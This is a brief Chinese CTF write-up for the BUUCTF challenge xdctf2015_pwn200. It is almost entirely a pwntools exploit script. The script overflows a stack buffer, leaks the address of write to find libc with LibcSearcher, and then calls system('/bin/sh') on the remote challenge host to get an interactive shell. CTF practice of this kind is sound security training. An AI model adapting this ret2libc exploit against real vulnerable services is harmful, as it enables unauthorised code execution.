[BUUCTF-pwn]——xdctf2015_pwn200

一个简单的ret2libc的题目， 前面写了不少了这里只给exp了

exploit

from pwn import *
from LibcSearcher import *
p = remote('node3.buuoj.cn',27025)
elf = ELF('./bof')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.symbols['main']
payload = 'a' * (0x6c + 4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)p.sendafter("to XDCTF2015~!\n",payload)write_addr = u32(p.recv(4))
log.success("write_addr ---->:" + hex(write_addr))libc = LibcSearcher("write",write_addr)
libc_base = write_addr - libc.dump("write")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = 'a' * (0x6c + 4) + p32(sys_addr) + p32(main) + p32(binsh)p.sendafter("to XDCTF2015~!\n",payload)
p.interactive()

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！